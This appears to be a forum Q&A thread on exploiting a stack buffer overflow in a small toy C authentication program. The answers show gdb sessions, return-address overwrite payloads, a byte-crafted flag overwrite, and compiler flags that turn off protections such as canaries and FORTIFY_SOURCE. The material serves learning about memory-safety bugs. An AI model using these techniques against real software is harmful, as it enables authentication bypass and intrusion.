0x080484bb <+71>: jne 0x80484c4 <check_auth1+80>
0x080484bd <+73>: movl $0x1,-0xc(%ebp)
0x080484c4 <+80>: mov -0xc(%ebp),%eax
0x080484c7 <+83>: add $0x20,%esp
0x080484ca <+86>: pop %esi
0x080484cb <+87>: pop %edi
0x080484cc <+88>: pop %ebp
0x080484cd <+89>: ret
This is quite easy to exploit, here is the way to walk through.
First compile it with -g, it makes it easier to understand what you are doing. Then, our goal will be to rewrite the saved eip of check_auth1() and move it to the else-part of the test in the main() function.
$> gcc -m32 -g -o vuln vuln.c
$> gdb ./vuln
...
(gdb) break check_auth1
Breakpoint 1 at 0x80484c3: file vulne.c, line 9.
(gdb) run `python -c 'print("A"*28)'`
Starting program: ./vulne `python -c 'print("A"*28)'`
Breakpoint 1,check_auth1 (password=0xffffd55d 'A' <repeats 28 times>) at vuln.c:9
9 int auth_flag = 0;
(gdb) info frame
Stack level 0, frame at 0xffffd2f0:
eip = 0x80484c3 in check_auth1 (vuln.c:9); saved eip 0x804853f
called by frame at 0xffffd320
source language c.
Arglist at 0xffffd2e8, args: password=0xffffd55d 'A' <repeats 28 times>
Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
Saved registers:
ebp at 0xffffd2e8, eip at 0xffffd2ec
We stopped at check_auth1() and displayed the stack frame. We saw that the saved eip is stored in the stack at 0xffffd2ec and contains 0x804853f.
Let see to what it does lead:
(gdb) disassemble main
Dump of assembler code for function main:
0x080484ff <+0>: push %ebp
0x08048500 <+1>: mov %esp,%ebp
0x08048502 <+3>: and $0xfffffff0,%esp
0x08048505 <+6>: sub $0x20,%esp
0x08048508 <+9>: cmpl $0x1,0x8(%ebp)
0x0804850c <+13>: jg 0x804852f <main+48>
0x0804850e <+15>: mov 0xc(%ebp),%eax
0x08048511 <+18>: mov (%eax),%eax
0x08048513 <+20>: mov %eax,0x4(%esp)
0x08048517 <+24>: movl $0x8048604,(%esp)
0x0804851e <+31>: call 0x8048360 <printf#plt>
0x08048523 <+36>: movl $0x0,(%esp)
0x0804852a <+43>: call 0x80483a0 <exit#plt>
0x0804852f <+48>: mov 0xc(%ebp),%eax
0x08048532 <+51>: add $0x4,%eax
0x08048535 <+54>: mov (%eax),%eax
0x08048537 <+56>: mov %eax,(%esp)
0x0804853a <+59>: call 0x80484bd <check_auth1>
0x0804853f <+64>: mov %eax,0x1c(%esp) <-- We jump here when returning
0x08048543 <+68>: cmpl $0x1,0x1c(%esp)
0x08048548 <+73>: je 0x8048558 <main+89>
0x0804854a <+75>: movl $0x804861a,(%esp)
0x08048551 <+82>: call 0x8048380 <puts#plt>
0x08048556 <+87>: jmp 0x8048564 <main+101>
0x08048558 <+89>: movl $0x8048627,(%esp) <-- We want to jump here
0x0804855f <+96>: call 0x8048380 <puts#plt>
0x08048564 <+101>: mov $0x0,%eax
0x08048569 <+106>: leave
0x0804856a <+107>: ret
End of assembler dump.
But the truth is that we want to avoid to go through the cmpl $0x1,0x1c(%esp) and go directly to the else-part of the test. Meaning that we want to jump to 0x08048558.
Anyway, lets first try to see if our 28 'A' are enough to rewrite the saved eip.
(gdb) next
10 strcpy(password_buffer, password);
(gdb) next
11 if (strcmp(password_buffer, "cup") == 0) {
Here, the strcpy did the overflow, so lets look at the stack-frame:
(gdb) info frame
Stack level 0, frame at 0xffffd2f0:
eip = 0x80484dc in check_auth1 (vulnerable.c:11); saved eip 0x41414141
called by frame at 0xffffd2f4
source language c.
Arglist at 0xffffd2e8, args: password=0xffffd55d 'A' <repeats 28 times>
Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
Saved registers:
ebp at 0xffffd2e8, eip at 0xffffd2ec
Indeed, we rewrote the saved eip with 'A' (0x41 is the hexadecimal code for A). And, in fact, 28 is exactly what we need, not more. If we replace the four last bytes by the target address it will be okay.
One thing is that you need to reorder the bytes to take the little-endianess into account. So, 0x08048558 will become \x58\x85\x04\x08.
Finally, you will also need to write some meaningful address for the saved ebp value (not AAAA), so my trick is just to double the last address like this:
$> ./vuln `python -c 'print("A"*20 + "\x58\x85\x04\x08\x58\x85\x04\x08")'`
Note that there is no need to disable the ASLR, because you are jumping in the .text section (and this section do no move under the ASLR). But, you definitely need to disable canaries.
EDIT: I was wrong about replacing the saved ebp by our saved eip. In fact, if you do not give the right ebp you will hit a segfault when attempting to exit from main. This is because, we did set the saved ebp to somewhere in the .text section and, even if there is no problem when returning from check_auth1, the stack frame will be restored improperly when returning in the main function (the system will believe that the stack is located in the code). The result will be that the 4 bytes above the address pointed by the saved ebp we wrote (and pointing to the instructions) will be mistaken with the saved eip of main. So, either you disable the ASLR and write the correct address of the saved ebp (0xffffd330) which will lead to
$> ./vuln `python -c 'print("A"*20 + "\xff\xff\xd3\x30\x58\x85\x04\x08")'`
Or, you need to perform a ROP that will perform a clean exit(0) (which is usually quite easy to achieve).
you're checking against 1 exactly; change it to (the much more normal style for c programming)
if (! authenticated) {
and you'll see that it is working (or run it in gdb, or print out the flag value, and you'll see that the flag is being overwritten nicely, it's just not 1).
remember that an int is made of multiple chars. so setting a value of exactly 1 is hard, because many of those chars need to be zero (which is the string terminator). instead you are getting a value like 13363 (for the password 12345678901234).
[huh; valgrind doesn't complain even with the overflow.]
UPDATE
ok, here's how to do it with the code you have. we need a string with 13 characters, where the final character is ASCII 1. in bash:
> echo -n "123456789012" > foo
> echo $'\001' >> foo
> ./a.out `cat foo`
Allowed.
where i am using
if (authenticated != 1) {
printf("NOT Allowed.\n");
} else {
printf("Allowed.\n");
}
also, i am relying on the compiler setting some unused bytes to zero (little endian; 13th byte is 1 14-16th are 0). it works with gcc bo.c but not with gcc -O3 bo.c.
the other answer here gets around this by walking on to the next place that can be overwritten usefully (i assumed you were targeting the auth_flag variable since you placed it directly after the password).
strcpy(password_buffer, password);
One of the things you will need to address during testing is this function call. If the program seg faults, then it could be because of FORTIFY_SOURCE. I'd like to say "crashes unexpectedly", but I don't think that applies here ;)
FORTIFY_SOURCE uses "safer" variants of high risk functions like memcpy and strcpy. The compiler uses the safer variants when it can deduce the destination buffer size. If the copy would exceed the destination buffer size, then the program calls abort().
To disable FORTIFY_SOURCE for your testing, you should compile the program with -U_FORTIFY_SOURCE or -D_FORTIFY_SOURCE=0.

Resources